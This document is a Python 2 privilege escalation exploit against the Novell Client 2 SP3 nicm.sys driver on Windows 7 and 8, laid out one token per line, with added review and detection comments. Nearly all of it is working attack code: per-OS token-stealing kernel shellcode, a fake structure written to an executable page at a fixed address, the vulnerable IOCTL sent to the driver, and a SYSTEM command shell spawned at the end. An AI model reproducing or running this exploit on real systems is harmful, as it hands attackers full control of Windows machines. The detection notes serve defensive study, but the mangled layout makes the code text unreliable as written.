# Novell Client 2 SP3 Privilege escalation exploit
# Tested on Windows 7 and 8 (x86) / nicm.sys 3.1.11.0
# Thanks to Master Ryujin :)
# The first public information I have seen about this bug was from Nikita Tarakanov @NTarakanov (I am not sure whether anything else was public)
# Exploit for DEMO purposes :)
# Does not bypass SMEP on Windows 8
# Metasploit module working against Windows 7: http://www.exploit-db.com/exploits/26452/
from
ctypes
import
*
import
sys,struct,os
from
optparse
import
OptionParser
# Win32 / NT API entry points via ctypes. Everything below talks to the
# nicm.sys device through kernel32/ntdll, so the script is Windows-only.
kernel32
=
windll.kernel32
ntdll
=
windll.ntdll
# Entry point. NOTE(review): the file is mangled one token per line; the
# "= =" on the next two lines is "==". The statements read as Python 2
# (print statements, str literals used directly as raw byte buffers).
if
__name__
=
=
'__main__'
:
# Command-line parsing: -o selects which set of per-OS constants is used.
usage
=
"%prog -o <target>"
parser
=
OptionParser(usage
=
usage)
parser.add_option(
"-o"
,
type
=
"string"
,
action
=
"store"
, dest
=
"target_os"
,
help
=
"Available target operating systems: WIN7, WIN8"
)
(options, args)
=
parser.parse_args()
# Reject anything other than WIN7/WIN8 (case-insensitive), print usage and
# exit; the value is upper-cased once here and compared literally below.
OS
=
options.target_os
if
not
OS
or
OS.upper()
not
in
[
'WIN7'
,
'WIN8'
]:
parser.print_help()
sys.exit()
OS
=
OS.upper()
# Per-OS constants. The four single-byte values are what the inline comments
# call "offsets" for the given Windows version (not verified here). They are
# spliced into the byte string below, so a wrong value silently corrupts the
# payload instead of failing cleanly.
if
OS
=
=
"WIN7"
:
_KPROCESS
=
"\x50"
# Offset for Win7
_TOKEN
=
"\xf8"
# Offset for Win7
_UPID
=
"\xb4"
# Offset for Win7
_APLINKS
=
"\xb8"
# Offset for Win7
# Payload assembled from raw bytes (named for what it does). Each
# "\x00\x00\x00" appended after an offset byte widens it to a 4-byte
# little-endian value.
steal_token
=
"\x52"
+
\
"\x53"
+
\
"\x33\xc0"
+
\
"\x64\x8b\x80\x24\x01\x00\x00"
+
\
"\x8b\x40"
+
_KPROCESS
+
\
"\x8b\xc8"
+
\
"\x8b\x98"
+
_TOKEN
+
"\x00\x00\x00"
+
\
"\x89\x1d\x00\x09\x02\x00"
+
\
"\x8b\x80"
+
_APLINKS
+
"\x00\x00\x00"
+
\
"\x81\xe8"
+
_APLINKS
+
"\x00\x00\x00"
+
\
"\x81\xb8"
+
_UPID
+
"\x00\x00\x00\x04\x00\x00\x00"
+
\
"\x75\xe8"
+
\
"\x8b\x90"
+
_TOKEN
+
"\x00\x00\x00"
+
\
"\x8b\xc1"
+
\
"\x89\x90"
+
_TOKEN
+
"\x00\x00\x00"
+
\
"\x5b"
+
\
"\x5a"
+
\
"\xc2\x08"
sc
=
steal_token
# WIN8 branch (the only other value the check above lets through). Same
# payload shape with different constants; note _KPROCESS is widened to four
# bytes here ("\x8b\x80" + three zero bytes) where the WIN7 branch keeps it
# at one byte ("\x8b\x40" + _KPROCESS).
else
:
_KPROCESS
=
"\x80"
# Offset for Win8
_TOKEN
=
"\xEC"
# Offset for Win8
_UPID
=
"\xB4"
# Offset for Win8
_APLINKS
=
"\xB8"
# Offset for Win8
steal_token
=
"\x52"
+
\
"\x53"
+
\
"\x33\xc0"
+
\
"\x64\x8b\x80\x24\x01\x00\x00"
+
\
"\x8b\x80"
+
_KPROCESS
+
"\x00\x00\x00"
+
\
"\x8b\xc8"
+
\
"\x8b\x98"
+
_TOKEN
+
"\x00\x00\x00"
+
\
"\x8b\x80"
+
_APLINKS
+
"\x00\x00\x00"
+
\
"\x81\xe8"
+
_APLINKS
+
"\x00\x00\x00"
+
\
"\x81\xb8"
+
_UPID
+
"\x00\x00\x00\x04\x00\x00\x00"
+
\
"\x75\xe8"
+
\
"\x8b\x90"
+
_TOKEN
+
"\x00\x00\x00"
+
\
"\x8b\xc1"
+
\
"\x89\x90"
+
_TOKEN
+
"\x00\x00\x00"
+
\
"\x5b"
+
\
"\x5a"
+
\
"\xc2\x08"
sc
=
steal_token
# Buffer that is placed at the fixed address 0x0d0d0000. Read as 32-bit
# little-endian values it holds 0x0d0d0014, 0x0d0d0018 and 0x0d0d0028,
# i.e. addresses inside that same page, separated by 0x41 filler; the
# payload is appended at byte offset 0x28 (4 + 16 + 4 + 12 + 4), which is
# exactly what the last value points to. Everything hinges on the page
# really being mapped at that hard-coded address (see the allocation below).
kernel_sc
=
"\x14\x00\x0d\x0d"
kernel_sc
+
=
"\x41\x41\x41\x41"
kernel_sc
+
=
"\x41\x41\x41\x41"
kernel_sc
+
=
"\x41\x41\x41\x41"
kernel_sc
+
=
"\x41\x41\x41\x41"
kernel_sc
+
=
"\x18\x00\x0d\x0d"
kernel_sc
+
=
"\x41\x41\x41\x41"
kernel_sc
+
=
"\x41\x41\x41\x41"
kernel_sc
+
=
"\x41\x41\x41\x41"
kernel_sc
+
=
"\x28\x00\x0d\x0d"
kernel_sc
+
=
sc
# Python 2 print statements.
print
"[>] Novell Client 2 SP3 privilege escalation for Windows 7 and Windows 8."
print
"[>] Finding the driver."
# Open the nicm device read/write, share mode 0, OPEN_EXISTING.
# NOTE(review): CreateFileA returns INVALID_HANDLE_VALUE (-1) on failure and
# ctypes hands that back as the int -1, which is truthy, so the
# "if device_handler:" test further down does not detect a failed open.
# Detection note: a process other than the Novell client opening \\.\nicm
# with GENERIC_WRITE is the first observable step of this sequence.
GENERIC_READ
=
0x80000000
GENERIC_WRITE
=
0x40000000
OPEN_EXISTING
=
0x3
DEVICE
=
'\\\\.\\nicm'
device_handler
=
kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE,
0
,
None
, OPEN_EXISTING,
0
,
None
)
# IOCTL code the author marks as the vulnerable one; with the device name it
# is the concrete indicator to alert on.
EVIL_IOCTL
=
0x00143B6B
# Vulnerable IOCTL
# DeviceIoControl arguments. The "input buffer" argument is the raw integer
# address 0x0d0d0000 (not a Python buffer) with a length of 0x14 bytes; no
# output buffer is supplied. "inut" is a typo but is a runtime name, so it is
# left as-is here; retn receives the bytes-returned count.
retn
=
c_ulong()
inut_buffer
=
0x0d0d0000
inut_size
=
0x14
output_buffer
=
0x0
output_size
=
0x0
# Allocation request: fixed base 0x0d0d0000, one page (0x1000),
# MEM_COMMIT|MEM_RESERVE (0x1000|0x2000), PAGE_EXECUTE_READWRITE (0x40).
# An RWX page at a fixed low user-mode address is itself a strong
# behavioural signal. NOTE(review): Zero_Bits is defined but never used; the
# call below passes the literal 0x0 instead.
baseadd
=
c_int(
0x0d0d0000
)
MEMRES
=
(
0x1000
|
0x2000
)
PAGEEXE
=
0x00000040
Zero_Bits
=
c_int(
0
)
RegionSize
=
c_int(
0x1000
)
write
=
c_int(
0
)
print
"[>] Allocating memory for our shellcode."
# -1 is the current-process pseudo-handle. NOTE(review): dwStatus (the
# NTSTATUS) is never checked; if the page cannot be mapped at the requested
# base, the write below targets unmapped memory and the process faults.
dwStatus
=
ntdll.NtAllocateVirtualMemory(
-
1
, byref(baseadd),
0x0
, byref(RegionSize), MEMRES, PAGEEXE)
print
"[>] Writing the shellcode."
# NOTE(review): copies 0x1000 bytes from kernel_sc, which is only a few
# dozen bytes long, so the call reads past the end of the Python string.
# The BOOL return and the bytes-written count ("write") are both ignored.
kernel32.WriteProcessMemory(
-
1
,
0x0d0d0000
, kernel_sc,
0x1000
, byref(write))
# Trigger. As noted at CreateFileA, this guard does not catch a failed open,
# and dev_io (BOOL) is never inspected, so an unsuccessful IOCTL is silent.
if
device_handler:
print
"[>] Sending IOCTL to the driver."
dev_io
=
kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn),
None
)
# The shell is spawned unconditionally, whether or not the IOCTL ran or
# succeeded, and the device handle is never closed (no CloseHandle).
# Detection note: cmd.exe as a child of a process that just opened \\.\nicm
# and allocated an RWX page at 0x0d0d0000 is the natural end of the chain.
print
"[>] Dropping to a SYSTEM shell."
os.system(
"cmd.exe /K cd C:\\windows\\system32"
)